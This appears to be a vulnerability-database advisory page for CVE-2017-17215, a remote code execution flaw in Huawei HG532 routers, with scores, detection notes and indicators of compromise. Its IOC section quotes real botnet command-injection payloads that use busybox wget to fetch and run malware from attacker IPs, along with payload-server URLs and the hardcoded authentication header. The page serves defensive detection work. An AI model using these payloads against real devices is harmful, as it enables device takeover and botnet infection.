cbcvebase.
CVE-2017-17215
published 2018-03-20

CVE-2017-17215: Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to…

PriorityP186high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
78.61%
99.5th percentile
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.

Affected

1 ranges
VendorProductVersion rangeFixed in
huawei_technologies_co_ltdhg532

Detection & IOCsextracted from sources · hover to see the quote

port37215
urlPOST /ctrlt/DeviceUpgrade_1
command$(/bin/busybox wget -g %s -l /tmp/huawei -r /huawei; sh /tmp/huawei)$(echo HUAWEIUPNP)
command$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)$(echo HUAWEIUPNP)
ip178.62.227.13
url178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazebe
url178[.]62.227.13/wrgjwrgjwrg246356356356/hmicroblazeel
url178[.]62.227.13/wrgjwrgjwrg246356356356/hnios2
url178[.]62.227.13/wrgjwrgjwrg246356356356/hopenrisc
url178[.]62.227.13/wrgjwrgjwrg246356356356/hxtensa
hash1e16db506c1b8376f8998907d75a4353c798530889224e5cfa8b21a36561a21f
hashcd9d823b0f1ce2cf7b89d3a705d1b28f7c7874dbf0409a9111220cf42e94bcb4
url176.32.33.123/vi/.bushido
url46.29.163.168/vi/.bushido
url46.17.43.229/vi/.bushido
url194.36.173.4/vi/.bushido
url194.36.173.4/exploit/.exploit
hash402f7be58a8165c39e95b93334a706ec13fe076a2706d2c32d6360180bba0a74
hash76af2c3ff471916bc247e4c254c9b2affa51edb7e1a18825f36817e8c5921812
hash7bd284f4da09d3a95472a66e0867d778eeb59ed54738f6fb6e417e93c0b65685
hashf693442a7e30876b46fd636d9df25495261be5c1a4f7b13e0fe5afc1b908e774
hash2e66ee1b4414fe2fb17da4372c43a826dd7767c189120eafd427773769302e35
ip185.244.25.168
url185[.]244.25[.]168/mips
url185[.]244.25[.]168/x86
url185[.]244.25[.]168/OwO/Tsunami.mips
url185[.]244.25[.]168/x86/mipsel
url185[.]244.25[.]221/bins/Yowai.mips
url185[.]244.25[.]221/bins/Yowai.mpsl
url185[.]244.25[.]221/bins/Yowai.x86
url185[.]244.25[.]221/Yowai.mips
hash3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d
ip213.183.53.120
ip46.243.189.101
path/ctrlt/DeviceUpgrade_1
  • CVE-2017-17215 exploit targets the Huawei HG532 SOAP endpoint /ctrlt/DeviceUpgrade_1 on port 37215 via HTTP POST with a crafted Authorization Digest header (username="dslf-config", realm="HuaweiHomeGateway") and a command-injection payload in the body using the pattern $(...)$(echo HUAWEIUPNP).
  • The string 'HUAWEIUPNP' (via echo HUAWEIUPNP) is a reliable network-level signature for CVE-2017-17215 exploit attempts; detect it in HTTP POST body traffic to port 37215.
  • Trend Micro IDS/IPS rule 1134287 'WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)' covers this exploit; use as a reference signature pattern.
  • Fortinet IPS signature 'Huawei.HG532.Remote.Code.Execution' covers CVE-2017-17215 exploitation attempts.
  • Yowai (Mirai variant) listens on port 6 for C2 commands; monitor for unexpected inbound/outbound connections on TCP port 6 from IoT devices.
  • Mirai variant (Campaign 1/Omni) uses XOR table key 0xBAADF00D and drops iptables rules to block further connections on certain ports after infection; look for iptables DROP rules added by a newly spawned process on IoT devices.
  • Botnet exploiting CVE-2017-17215 uses custom UPX packing with unique signatures; scan for UPX-packed ELF binaries with non-standard UPX headers on IoT devices.
  • ·The CVE-2017-17215 exploit requires the attacker to be authenticated (per NVD), but in practice Mirai/Bushido variants supply a hardcoded Digest Authorization header (username='dslf-config', realm='HuaweiHomeGateway') in the exploit payload, effectively bypassing the authentication requirement on default-configured devices.
  • ·The Mirai variant payload server at 178.62.227.13 switched from an open directory listing to hiding file listings on February 22, 2019, while continuing to serve files; direct URL enumeration may no longer work but direct file fetches remain active.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.